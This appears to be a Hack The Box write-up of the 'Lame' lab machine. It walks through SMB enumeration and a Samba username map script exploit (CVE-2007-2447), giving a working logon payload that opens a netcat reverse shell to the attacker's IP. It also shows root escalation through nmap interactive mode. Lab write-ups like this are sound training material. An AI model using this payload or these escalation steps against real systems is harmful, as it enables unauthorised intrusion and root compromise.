Hack the Box Platform Challenge: Lame Write-up

This was one of the easiest machines to "pop". We will be using both the manual way and kali's metasploit.

Hostname: Lame, IP : 10.10.10.3, Os: Linux.

Enumeration 1:

We begin with a nmap scan which shows 4 open ports and different services running on them.



Exploitation:

Our initial exploit vector is ftp port 21 that's open and allows anonymous login. The FTP software running is vsftpd 2.3.4 but unfortunately there is nothing useful here.



Next we try to find out if anonymous login is allowed via SMB enumeration and if we can list the shares that Samba exposes:



We find out that we might be able to access tmp and opt shares but we try to gather more information using enum4linux (enum4linux -a 10.10.10.3) and nmap vuln script (nmap --script smb-vuln* 10.10.10.3 --script-args=unsafe=1 -p 445 10.10.10.3)before we try them. We find the domain admin SID (S-1-5-21-2446995257-2525374255-2673161615-512), local admin SID (S-1-5-21-2446995257-2525374255-2673161615-500 LAME\Administrator (Local User))and that mapping is allowed on the tmp share.





Manual Exploitation:

I used the command: smbclient //10.10.10.3/tmp to connect to LAME using smbclient. I also used the help command to see what commands I can run. I also started a nc listener on port 4444 and Finally ran the payload: logon "./=`nohup nc -e /bin/sh 10.10.14.20 4444`" and got a root shell and the root flag!!.



Using Metasploit:

The nmap scan results showed LAME running samba service Samba smbd 3.X and smbd 3.0.20-Debian. Googling smbd 3.X exploit, I found "Samba 3.5.11/3.6.3 - Remote Code Execution" exploit on exploit-db. CVE-2007-2447 "‘Username’ map script’" .

On metasploit framework, I user the ‘Username’ map script’ exploit and set rhost parameters and ran the script as in the picture below and get a command shell as root!!





Extra;

Root can also be achieved by escalating privs using nmap interactive as well;

sh-3.2$ id

id

uid=1(daemon) gid=1(daemon) groups=1(daemon)

sh-3.2$ nmap --interactive

nmap --interactive

Starting Nmap V. 4.53 ( http://insecure.org )

Welcome to Interactive Mode -- press h for help

nmap> !sh

!sh

sh-3.2# id

id

uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)